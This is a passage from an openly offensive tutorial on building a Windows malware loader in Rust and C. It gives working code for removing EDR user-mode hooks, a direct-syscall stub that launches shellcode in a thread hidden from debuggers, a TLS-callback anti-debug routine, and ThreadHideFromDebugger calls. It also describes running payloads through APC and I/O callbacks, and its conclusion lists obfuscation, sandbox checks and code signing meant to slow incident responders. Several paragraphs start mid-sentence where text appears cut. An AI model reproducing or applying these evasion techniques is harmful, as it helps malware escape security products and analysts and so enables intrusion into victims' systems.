use windows::Win32::Foundation::PAGE_EXECUTE_READWRITE;

let user32 = unsafe { GetModuleHandleW("user32.dll") }.unwrap();

let msgbox_ptr = unsafe { GetProcAddress(user32, "MessageBoxW") }.unwrap();

// Suppose we found a hook (e.g., first byte is 0xC3 which is 'RET')

unsafe {

let mut old_protect = 0;

VirtualProtect(msgbox_ptr, 16, PAGE_EXECUTE_READWRITE, &mut old_protect);

std::ptr::copy_nonoverlapping(orig_bytes_ptr, msgbox_ptr as *mut u8, 16);

VirtualProtect(msgbox_ptr, 16, old_protect, &mut old_protect);

}

After restoring the first 16 bytes of MessageBoxW, the hook is removed and calling MessageBoxW will behave normally. This kind of hook surgery can be done for any critical functions the malware plans to use (thread creation, virtual memory allocation, etc.).

syscall instruction with the proper syscall number set in the EAX register (and RCX holding a pointer to arguments per x64 calling convention). The syscall numbers differ by Windows version, so hard coding them is brittle; projects like SysWhispers can generate up to date assembly stubs for direct syscalls.

As an example, here is a simple x64 assembly stub for NtCreateThreadEx (Windows 10 x64 version 1909, where the syscall number for NtCreateThreadEx is 0xBD):

section .text

global NtCreateThreadEx

NtCreateThreadEx:

mov r10, rcx ; Move first param into r10 (per Windows x64 ABI for syscalls)

mov eax, 0xBD ; Syscall number for NtCreateThreadEx

syscall ; Make the system call to kernel mode

ret

We assemble this stub and link it into our code (using an assembler or embedding it via an .asm file in the build). Then, we declare the function:

extern "system" {

fn NtCreateThreadEx(

thread_handle: *mut HANDLE,

desired_access: u32,

obj_attributes: *const c_void,

process_handle: HANDLE,

start_address: extern "system" fn(*mut c_void) -> u32,

parameter: *mut c_void,

create_flags: u32,

zero_bits: usize,

stack_size: usize,

max_stack: usize,

attribute_list: *mut c_void

) -> i32;

}

Now we can call unsafe { NtCreateThreadEx(&mut hThread, 0x1FFFFF, std::ptr::null(), GetCurrentProcess(), Some(shellcode_fn), std::ptr::null_mut(), 4, 0, 0, 0, std::ptr::null_mut()) };

to create a hidden thread. Note the flag value of 4: THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER (0x4) is a special flag for NtCreateThreadEx that starts the new thread in a “hidden” mode where user mode debuggers won’t get notified of its creation (effectively an anti debug measure). We included this flag to both evade user land hooks and make the new thread invisible to any debugger attached to the process.

Using direct syscalls means that even if an EDR has hooked CreateThread or NtCreateThreadEx in user mode, we aren’t invoking those hooks at all; we jump straight to the kernel. This greatly complicates things for security products, as they would need to hook at the kernel level (which is much harder and often outside the scope of user mode AV). As a side note, these techniques are common in modern kernel anticheats as well.

main or WinMain). Malware can use a TLS callback to run anti analysis or even malicious code earlier than the analyst expects. For example, a TLS callback might check IsDebuggerPresent and exit the process if a debugger is detected, before main ever runs (so an analyst hitting a breakpoint at main never gets there because the process already quit in the TLS callback). Setting up a TLS callback in Rust is not trivial (it involves crafting the TLS directory), but in C/C++ you can do it with linker directives:

// C example

void NTAPI TlsCallback(PVOID DllHandle, DWORD Reason, PVOID Reserved) {

if (Reason == DLL_PROCESS_ATTACH) {

if (IsDebuggerPresent()) ExitProcess(0);

}

}

#pragma comment(linker, "/INCLUDE:_tls_used")

#pragma comment(linker, "/INCLUDE:tls_callback_func")

EXTERN_C const PIMAGE_TLS_CALLBACK tls_callback_func = TlsCallback;

This instructs the linker to include a TLS entry for TlsCallback. The callback checks for a debugger and terminates if found. TLS callbacks run for EXEs on process start (and for DLLs on load). Most debuggers are aware of TLS callbacks nowadays and will break after them by default, but it's still an extra obstacle.

THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER flag above. Additionally, the Windows API NtSetInformationThread with ThreadHideFromDebugger can be used on the current thread to stop the debugger from receiving events from it. Calling this (if not already hooked) will make the malware’s main thread invisible to a user mode debugger (no more breakpoints or single step traps on that thread). In Rust:

use windows::Win32::System::Threading::NtSetInformationThread;

const ThreadHideFromDebugger: u32 = 0x11;

unsafe { NtSetInformationThread(GetCurrentThread(), ThreadHideFromDebugger, std::ptr::null(), 0) };

After this, an analyst who was attached will often find that the process appears to “freeze”. In reality, the thread is still running but no longer sends debug events, so the debugger doesn’t know what it’s doing. This API can also be hooked, so crafty malware might resolve and call it via a direct syscall to be safe.

SetWindowsHookEx that points to malicious code, or an APC with NtQueueApcThread). The code then executes in a context that analysts might not immediately trace to the origin. Another trick is using legitimate callback based APIs as Trojan horses. For example, ReadFileEx takes a function pointer callback that will be called when an overlapped read completes. Malware could initiate a dummy read and supply a shellcode pointer as the callback; any monitoring focusing on CreateThread might miss that the payload ran via an I/O completion callback.

Finally, combining these techniques can yield sophisticated evasions. In our scenario, after integrating direct syscalls and hook detection, our malware was able to spawn threads and allocate memory without triggering the user mode AV hooks, and it obscured its execution flow such that even if a debugger attached late, crucial setup code may have already run in hidden threads or TLS callbacks. Each added layer raises the bar for defenders to analyze or intercept the malware in action.

Conclusion:

In this technical overview, we built a custom malware loader step by step, incorporating increasingly advanced techniques to evade detection and analysis:

- We started with a basic shellcode injection and execution method, using VirtualAlloc and CreateThread.

- Next, we added shellcode obfuscation (ROT13, XOR) to make it harder to analyze statically.

- We improved the binary’s legitimacy with code signing and by targeting the 64-bit architecture.

- We implemented extensive sandbox and VM checks (CPU, RAM, disk, user activity, Internet) to ensure the payload runs only on real user systems.

- We integrated numerous anti debug tricks to detect (and deter) live analysis by an expert.

- We hid our intent from static analysis by dynamically resolving APIs, hashing strings, and even leveraging compile time obfuscation.

- And finally, we defeated user mode hooks and surveillance by performing direct syscalls and carefully restoring or avoiding hooked functions, and by misusing execution mechanisms like TLS callbacks and hidden threads.

Each of these techniques on its own can be bypassed by determined defenders, but together they create a layered defense that makes malware analysis time consuming and costly. The goal for malware authors is not to be unbeatable, but to slow down incident responders and automated systems. The longer it takes to unravel the malware, the longer it can persist in the wild undetected. As defenders harden their sandboxes and debugging tools, malware will continue evolving these evasion tactics, a continuous cat and mouse game at the heart of cybersecurity.